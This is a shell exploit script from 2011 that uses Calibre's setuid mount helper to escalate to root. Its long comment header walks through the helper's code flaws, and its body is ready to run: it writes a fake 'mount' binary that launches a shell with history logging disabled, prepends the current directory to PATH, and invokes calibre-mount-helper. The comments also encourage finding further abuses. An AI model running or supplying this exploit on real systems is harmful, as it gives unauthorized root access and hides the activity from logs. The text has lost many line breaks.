#!/bin/sh######################################## .50-Calibrer Assault Mount ## by zx2c4 ######################################################################################################################### Calibre uses a suid mount helper, and like nearly all suid mount helpers that# have come before it, it's badly broken. Let's go through Calibre's faulty code# available at http://pastebin.com/auz9SULi and look at the array of silly# things done, only one of which we actually need to get root.## In this spot here, we can create a directory owned by root anywhere we want:## 47 if (!exists(mp)) {# 48 if (mkdir(mp, S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH) != 0) {# 49 errsv = errno;# 50 fprintf(stderr, "Failed to create mount point with error: %s\n", strerror(errsv));# 51 }# 52 }## At this point, we can remove any empty directory we want:## 172 rmd = rmdir(mp);## And elsewhere, we can create and remove anything_we_want/.some_stupid_marker.# I'm sure you can figure out how to exploit these kinds of things :-P.## We also get the ability with this wonderful mount-helper to unmount and eject# any device that we want (as root), as well as mount any vfat filesystem that# we'd like.## Not only that, but we can pass params directly to mount, to some degree:# # 83 execlp("mount", "mount", "-t", "auto", "-o", options, dev, mp, NULL);## On this line, "dev" and "mp" are controlled by argv[2] and argv[3]. I'm sure# you can find fun things to do with this as well. (There -s and also the man# pages say the last -o is respected, etc etc. Be creative.)## But there's also something lurking that is way worse in this line. Is that# "execlp" we see? Yes. According to the man pages:## The execlp(), execvp(), and execvpe() functions duplicate the actions of# the shell in searching for an executable file if the specified# filename does not contain a slash (/) character.## execlp searchs PATH for where to find "mount", and then runs it as root. And,# with great joy, we find that we can trivially control PATH by setting it# before running the mount helper. So the attack plan is simple:## 1. Make an executable named "mount" in the current directory that executes# a shell.# 2. PATH=".:$PATH" calibre-mount-helper mount something somethingelse## And that's it! We have root. The below exploit creates things in a temporary# directory that gets cleaned up and displays some status information along the# way.## - zx2c4# 2011-11-1## Usage:# $ ./50calibrerassaultmount.sh# [+] Making temporary directory: /tmp/tmp.q5ktd8UcxP# [+] Making mount point.# [+] Writing malicious mounter.# [+] Overriding PATH and getting root.# [+] Cleaning up: /tmp/tmp.q5ktd8UcxP# [+] Checking root: uid=0(root) gid=0(root) groups=0(root)# [+] Launching shell.# sh-4.2# #################################################################################set -e
echo"#######################################"echo"# .50-Calibrer Assault Mount #"echo"# by zx2c4 #"echo"#######################################"echoecho -n "[+] Making temporary directory: "dir="$(mktemp -d)"echo"$dir"cd"$dir"echo"[+] Making mount point."
mkdir mountpoint
echo"[+] Writing malicious mounter."
cat > mount <<END#!/bin/shcd /echo "[+] Cleaning up: $dir"rm -rf "$dir"echo -n "[+] Checking root: "idecho "[+] Launching shell."HISTFILE="/dev/null" exec /bin/shEND
chmod +x mount
echo"[+] Overriding PATH and getting root."PATH=".:$PATH" calibre-mount-helper mount /dev/null mountpoint